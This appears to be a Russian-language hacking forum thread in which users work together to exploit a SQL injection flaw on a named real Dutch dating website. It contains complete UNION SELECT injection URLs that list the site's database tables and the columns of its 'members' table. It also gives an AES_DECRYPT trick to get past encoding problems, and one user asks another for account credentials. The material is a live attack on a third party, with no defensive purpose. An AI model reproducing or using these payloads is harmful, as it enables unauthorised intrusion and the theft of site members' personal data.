jjjjj

1.может лы быть такое что больше 400 полей в таблице?
может я чтото не так делаю?
Такого точно быть не может, но некоторые рукожопые программисты делают Join и до большего числа полей...

2.можно ли инджект без юниона использовать?
Ну теоретически можно завязаться на перебор с помощью Substr... Но оно тебе нужно? А вообще, Union на то и нужен чтобы в результирующую выборку добавить свой запрос и получить вывод необходимых тебе данных...

А насчёт инъекции - тут урла нужна... Фактически там может быть какой-нибудь хитрый фильтр, или нужно правильно закрыть условие запроса с помощью скобок... А возможно там ничего и не сделать... Например, вывод даёт второй запрос, а у тебя не проходит первый запрос и на этом работа паги завершается...

На mssql лучше использовать or, кроме того, там можно спользовать точку с запятой для разделения запросов. КОроче, читай статью [ cash ]

зы только сейчас понял, что там не mssql, извиняюсь, ступил.

ddf

Ты там регался? Дай учетку.

Пока могу сказать что 99 полей...

http://www.contactwereld.nl/weergave.asp?ben=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,CAST(TABLE_NAME+AS+BINARY),36,37,38,39,40 ,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 7,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73, 74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90 ,91,92,93,94,95,96,97,98,99+FROM+INFORMATION_SCHEM A.TABLES/*

Только что-то с кодировкой...

похоже багу закрыли... Редиректит на другую страницу :(

Ничего не закрыли. Проблемы с кодировкой решаются через AES_DECRYPT...

Вот все табы в базе:
http://www.contactwereld.nl/weergave.asp?ben=XXXXX'+UNION+SELECT+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,AES_DECRYPT(AES_ENCR YPT(TABLE_NAME,1),1),36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,6 2,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78, 79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95 ,96,97,98,99+FROM+INFORMATION_SCHEMA.TABLES/*
Вот все поля таблицы 'members':
http://www.contactwereld.nl/weergave.asp?ben=XXXXX'+UNION+SELECT+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,AES_DECRYPT(AES_ENCR YPT(COLUMN_NAME,1),1),36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61, 6 2,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78, 79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95 ,96,97,98,99+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE +TABLE_NAME='members'/*
В скандинавских языках я не силён, поэтому со значениями полей разбирайтесь сами... Благо в выводе присутствует большое число полей...

Ничего не закрыли.
хм, странно, при любом обращении к скрипту weergave.asp, меня редиректит на _http://www.contactwereld.nl/aanmelden.asp
в чем может быть проблема?